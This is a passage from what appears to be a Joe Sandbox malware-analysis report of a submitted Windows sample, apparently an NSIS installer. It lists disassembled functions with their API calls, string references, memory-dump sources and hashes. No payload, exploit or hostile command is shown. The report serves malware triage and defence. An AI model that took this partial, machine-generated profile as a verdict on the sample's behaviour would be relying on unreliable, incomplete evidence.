                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                  • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                  • DeleteObject.GDI32(?), ref: 00404A79
                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                  • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                  • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                  • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                  • String ID: $ @$M$N
                                                                                  • API String ID: 1638840714-3479655940
                                                                                  • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                  • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                  • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                  • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                  Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                  • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                  • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                  • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                  • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                  • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                  • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                    • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                    • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                    • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                    • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                                  • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                  • String ID: 82D$@%F$@rD$A
                                                                                  • API String ID: 3347642858-1086125096
                                                                                  • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                  • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                  • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                  • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                  Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                  • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                  • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                  • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                  • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                  • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                  • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                  • API String ID: 1916479912-1189179171
                                                                                  • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                  • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                  • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                  • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                  Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                  • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                                  • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                                  • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                  • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                  • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                  • FindClose.KERNEL32(?), ref: 00406E33
                                                                                  Strings
                                                                                  • \*.*, xrefs: 00406D03
                                                                                  • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                  • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                  • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                  • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                  • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                  • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                  • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                  • API String ID: 2035342205-3294556389
                                                                                  • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                  • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                  • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                  • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                  Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  • API String ID: 3581403547-784952888
                                                                                  • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                  • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                  • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                  • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                  Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                  Strings
                                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                  • API String ID: 542301482-1377821865
                                                                                  • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                  • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                  • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                  • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                  Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                  • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                  • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                  • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                  Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                  • API String ID: 20674999-2124804629
                                                                                  • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                  • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                  • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                  • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                  Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                  • ShowWindow.USER32(?), ref: 004054D2
                                                                                  • DestroyWindow.USER32 ref: 004054E6
                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                  • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                  • EnableWindow.USER32(?,?), ref: 0040573C
                                                                                  • EnableWindow.USER32(?,?), ref: 00405757
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                  • String ID: @rD
                                                                                  • API String ID: 184305955-3814967855
                                                                                  • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                  • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                  • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                  • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                  Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                  • GetSysColor.USER32(?), ref: 004041AF
                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                  • SendMessageW.USER32(00000000), ref: 00404251
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                  • SetCursor.USER32(00000000), ref: 004042D2
                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                  • SetCursor.USER32(00000000), ref: 004042F6
                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
